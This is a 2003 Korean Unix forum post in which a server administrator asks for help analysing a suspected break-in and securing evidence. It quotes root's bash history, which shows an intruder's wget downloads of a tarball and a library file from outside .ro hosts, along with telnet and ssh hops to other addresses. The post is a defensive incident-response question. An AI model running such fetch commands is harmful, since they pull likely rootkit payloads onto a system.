| [ CnUnix ] in KIDS 글 쓴 이(By): babs (창조가) 날 짜 (Date): 2003년 8월 11일 월요일 오후 11시 01분 48초 제 목(Title): 이거 해킹 분석줌 부탁해여.. ~root/.bash_history 를 열어보니 다음과 같은 내용이 있네요. wget schoolhelp.go.ro/likethis.tgz wget www.musketaro.go.ro/libcrypto.so.1 ftp ftp.as.ro 등등.. 그리고 host xxx.xxxxx.ac.kr ping (위 주소의 ip) telnet (위 주소의 ip) telnet 61.204.25.252 ssh -l wips 61.204.25.252 이런 내용이 있는데..저 xxx.xxxxx.ac.kr에서 침입한 건가요? 아님 우리 서버를 통해 저기루 들어갈려구 했던 걸까요? ssh -l wips 이건 또 뭐죠? 찾아보니 xxx대학 컴관련 대학원랩이던데.. 어디서 들어왔는지는 어떻게 알수 있죠? last 명령으로는 안보이던데.. 증거확보를 어떻게 하면 좋을까요? 저기서 들어온게 맞으면 저기 교수님한테 연락하면 되나요? |